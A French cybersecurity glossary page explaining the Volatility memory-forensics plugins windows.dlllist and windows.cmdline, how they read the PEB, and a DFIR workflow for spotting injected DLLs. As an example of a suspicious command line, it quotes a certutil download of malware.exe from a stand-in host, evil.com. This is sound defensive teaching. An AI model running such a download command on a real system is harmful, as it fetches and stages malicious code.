Aller au contenu principal
Expert Cybersécurité & IAv9.0
Centres de ressources conformité
Besoin d'un accompagnement expert ?
Devis personnalisé sous 24h — audit, conformité, incident
Checklists Sécurité — Audit & Durcissement
Formats disponibles
📄 PDF 📊 Excel 🌐 Web

11 checklists professionnelles couvrant 2 200+ points de contrôle. Téléchargement gratuit, aucune inscription.

Volatility dlllist cmdline

forensics

Définition

Les plugins dlllist et cmdline de Volatility permettent d'analyser en détail les processus identifiés lors de l'analyse mémoire. dlllist (windows.dlllist dans Volatility 3) liste toutes les DLLs chargées par chaque processus, révélant les injections de bibliothèques malveillantes. cmdline (windows.cmdline) affiche la ligne de commande complète avec laquelle chaque processus a été lancé, souvent révélatrice des intentions et techniques d'attaque. windows.dlllist analyse la structure PEB (Process Environment Block) de chaque processus pour extraire la liste des modules (DLLs) chargés dans le Load Order Module List. Pour chaque module, il affiche le nom, l'adresse de base en mémoire, le chemin complet sur le disque, et la taille. Les anomalies à rechercher incluent : des DLLs chargées depuis des chemins temporaires (TEMP, AppData\Local\Temp) plutôt que System32/SysWOW64, des noms similaires à des DLLs légitimes (ntdll_.dll, kernel32x.dll), des DLLs sans chemin correspondant sur le disque (indicatif de Reflective DLL Injection), et des modules avec une base d'adresse dans une plage inhabituelle. windows.cmdline extrait les arguments de ligne de commande depuis le PEB de chaque processus. Pour les malwares et les TTPs d'attaque, la ligne de commande est souvent très révélatrice : des arguments PowerShell encodés en base64 (-EncodedCommand, -enc), des chemins vers des fichiers temporaires suspects, des connexions réseau directes (certutil -urlcache -f http://evil.com/malware.exe), ou des options inhabituelles pour des processus systèmes (cmd.exe /c secret_command). La corrélation de dlllist et cmdline avec le résultat de pstree permet de construire une image complète de chaque processus suspect : d'où vient-il (parent), avec quels arguments a-t-il été lancé (cmdline), et quelles bibliothèques a-t-il chargées (dlllist). Cette vue combinée est essentielle pour comprendre la chaîne d'exécution d'une attaque.

Fonctionnement

windows.dlllist accède au PEB (Process Environment Block, pointé par FS:[0x30] ou GS:[0x60]) de chaque processus puis parcourt la structure PEB.Ldr (LoaderData) qui maintient trois listes doublement chaînées des modules (InLoadOrder, InMemoryOrder, InInitializationOrder). cmdline extrait PEB.ProcessParameters.CommandLine, une UNICODE_STRING pointant vers les arguments passés à CreateProcess.

Application DFIR

Workflow : 1) vol.py windows.dlllist --pid [PID suspect] → chercher DLLs en TEMP ou sans fichier disque, 2) vol.py windows.cmdline → PowerShell encodé, certutil download, wscript en -e, 3) Pour les DLLs injectées sans fichier disque : vol.py windows.malfind pour identifier les régions injectées, puis vol.py windows.dumpfiles pour extraire les fichiers correspondants. Comparer les DLLs présentes avec les listes de modules attendus pour chaque processus système.

Outils

Volatility 3 : vol.py -f dump.mem windows.dlllist [--pid PID], vol.py -f dump.mem windows.cmdline [--pid PID]. Volatility 2 : vol.py --profile=... dlllist -p [PID], cmdscan, consoles. Détection injection : windows.malfind (régions PE injectées), pe-sieve (live). Analyse Base64 : CyberChef (From Base64 → décodage commandes PowerShell).

Articles liés

Un projet cybersécurité ?

Expert dispo · Réponse 24h

Devis